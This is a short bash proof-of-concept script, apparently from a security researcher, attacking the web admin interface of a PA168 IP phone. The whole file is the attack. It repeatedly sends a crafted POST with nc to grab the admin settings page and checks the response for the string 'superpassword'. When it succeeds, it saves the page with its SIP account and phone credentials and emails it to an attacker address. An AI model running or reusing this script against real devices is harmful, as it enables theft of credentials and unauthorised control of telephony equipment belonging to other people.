#!/bin/bash host="192.168.1.100"; attackers_email="adrian.pastor-AT-procheckup.com" req="POST /g HTTP/1.0\r\nContent-length: 13\r\n\r\nback=++Back++\r\n\r\n"; while true do res=`echo -en $req | nc -nv $host 80`; if echo $res | grep superpassword # if this gets returned, then we got the settings page with all SIP account and IP phone creds then echo "GOT IT!" echo $res > "admin-settings-page" echo $res | mail $attackers_email -s "PA168 IP Phone admin's settings page" exit 1 else echo "bad luck" fi sleep 5 done